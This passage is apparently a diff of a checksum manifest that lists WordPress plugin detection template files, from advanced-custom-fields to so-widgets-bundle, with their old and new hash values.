-http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 -http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f -http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b -http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f -http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 -http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724 +http/technologies/wordpress/plugins/akismet.yaml:b007755cc48a7a531a0e8fa3c452f9f74b483a5c +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e +http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4 +http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f +http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07 +http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1 +http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c +http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff +http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a +http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c +http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d +http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a +http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae +http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299 +http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9 http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369 -http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff -http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a -http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e -http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f -http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af -http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb -http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e -http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7 -http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 -http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 -http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 -http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a -http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 -http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2 -http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e +http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844 +http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c +http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636 +http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e +http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a +http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f +http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7 +http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057 +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459 +http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad +http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f +http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0 +http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af +http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a +http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121 +http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984 http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45 -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72 -http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77 -http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb -http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8 -http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f -http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2 -http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5 -http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9 -http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33 -http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:8eb13bbd6a748173d4c23e37909d834d0cbf5a2d -http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b -http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b -http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630 -http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:2c6eb5a2958fa71c5f9b9f3c9cc3f923957ae653 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90 -http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078 -http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb -http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c -http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47 -http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5 -http/technologies/wordpress/plugins/instagram-feed.yaml:1bb251cec19a4850bae825a0ab57a25391c0d4bf -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b -http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952 -http/technologies/wordpress/plugins/jetpack-boost.yaml:74eb899976e975822bc9083ea905466b752a6e65 -http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e -http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c -http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9 -http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9 -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787 -http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764 -http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93 -http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b -http/technologies/wordpress/plugins/loginpress.yaml:9a0ec851b287c8d93465394a34c0e06dcdf58dcc -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea -http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d -http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd -http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f -http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919 -http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251 -http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e -http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6 -http/technologies/wordpress/plugins/ml-slider.yaml:0b55d89bf2436fbf542a3cbc63a71826e24b7b50 -http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c -http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f -http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6 -http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8 -http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70 -http/technologies/wordpress/plugins/otter-blocks.yaml:c907909dff50fd5a204cc3b85224965c2a3758b7 -http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1 -http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab +http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8 +http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77 +http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e +http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1 +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba +http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d +http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823 +http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24 +http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca +http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:084d783cf9aa3011d022dc95b4e5ac20e48ea1f3 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:dee7755fce70b6704235ecc3b81c8b5c109b0053 +http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214 +http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc +http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9 +http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765 +http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2 +http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23 +http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317 +http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461 +http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30 +http/technologies/wordpress/plugins/instagram-feed.yaml:bdd26849be9346090645fcedf5e7c21f9634433e +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b +http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f +http/technologies/wordpress/plugins/jetpack-boost.yaml:5344e84ef6d9c77864a3b4b68bfe1d966436d391 +http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde +http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a +http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac +http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046 +http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8 +http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b +http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0 +http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519 +http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4 +http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb +http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4 +http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623 +http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd +http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb +http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510 +http/technologies/wordpress/plugins/ml-slider.yaml:7c2b57d5255ea5e2cc0ee747502fb24949f46015 +http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29 +http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf +http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8 +http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159 +http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af +http/technologies/wordpress/plugins/otter-blocks.yaml:a78a532c8c365f7d5389a154c72ffab4a9e198f9 +http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68 +http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18 http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553 -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:988028ed95ba98427e7659a9ee664c6571e615d5 -http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f -http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83 -http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a -http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa -http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da -http/technologies/wordpress/plugins/post-types-order.yaml:c140e8206ede576928c853247b1139a9e1306bf2 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4 -http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad -http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175 -http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5 -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864 -http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490 -http/technologies/wordpress/plugins/sg-cachepress.yaml:3b166aca8dab47fdce5d13abd98c504b0abfbfcf -http/technologies/wordpress/plugins/sg-security.yaml:1d900366a34bc7240fd070b931b8a69db1fe6291 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:22cf98912edc91bf3425771d400c10f6e39a0e92 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59 +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:c32339accaeaeac78ec9c14a8092e538a37cae47 +http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c +http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d +http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988 +http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e +http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2 +http/technologies/wordpress/plugins/post-types-order.yaml:8db67ac7ec324b3d4800afe95f2c5b479fe0af82 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4 +http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147 +http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19 +http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8 +http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd +http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08 +http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:2529031f99ea27c92a54d847c15d77480847fdd7 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751 -http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81 -http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da 